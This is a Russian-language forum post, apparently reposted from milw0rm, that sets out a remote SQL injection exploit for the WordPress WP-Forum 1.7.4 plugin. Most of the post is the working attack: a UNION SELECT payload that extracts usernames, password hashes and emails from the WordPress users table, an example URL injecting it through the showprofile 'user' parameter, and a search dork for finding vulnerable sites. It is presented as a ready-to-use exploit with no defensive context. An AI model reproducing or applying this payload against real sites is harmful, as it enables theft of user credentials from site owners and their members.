20.01.2008, 14:38
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability
Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability
Код:
remote sql injection exploit
###############################################################
# >>> -::DESCRIPTION== >> WordPress forum plugin by Fredrik Fahlstad. Version: 1.7.4.
# >>> exploit: 1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_users where id=1/*
(wp_tbv_users)
# >>> google: Fredrik Fahlstad. Version: 1.7.4.
# >>> author websec Team ./members =====> Virus_C, Refresh , Virusa
# >>> page : hacking.ge
###############################################################
this is example
http://www.xxx.com/?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*
# milw0rm.com [2008-01-19]
Последний раз редактировалось Elekt; 24.01.2008 в 16:03..
|
|
|